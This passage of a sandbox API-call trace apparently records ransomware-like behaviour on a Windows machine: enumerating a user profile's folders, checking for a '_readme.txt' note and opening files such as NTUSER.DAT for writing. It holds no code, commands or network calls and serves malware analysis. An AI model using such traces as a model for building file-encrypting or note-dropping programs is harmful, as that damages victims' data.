HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0093.203] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0093.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.204] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0093.204] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3100 | out: hHeap=0x680000) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8a5807e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8a5807e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f914cd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f914cd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0093.204] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0093.205] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f9d33b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f9d33b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0093.205] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0093.205] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0093.205] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0093.205] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0093.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df28 | out: hHeap=0x680000) returned 1 [0093.205] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0093.205] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0093.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df28 | out: hHeap=0x680000) returned 1 [0093.205] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0093.205] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0093.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df28 | out: hHeap=0x680000) returned 1 [0093.205] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0093.205] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0093.205] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0093.206] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0093.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0093.206] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0093.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0093.206] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0093.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df28 | out: hHeap=0x680000) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fca6dd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fca6dd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fbc2590, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fbc2590, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0093.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c94a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.207] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0093.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0093.207] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c94a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.207] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0093.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f08 | out: hHeap=0x680000) returned 1 [0093.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.207] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.207] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.207] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.207] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f08 | out: hHeap=0x680000) returned 1 [0093.208] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f08 [0093.208] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.208] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 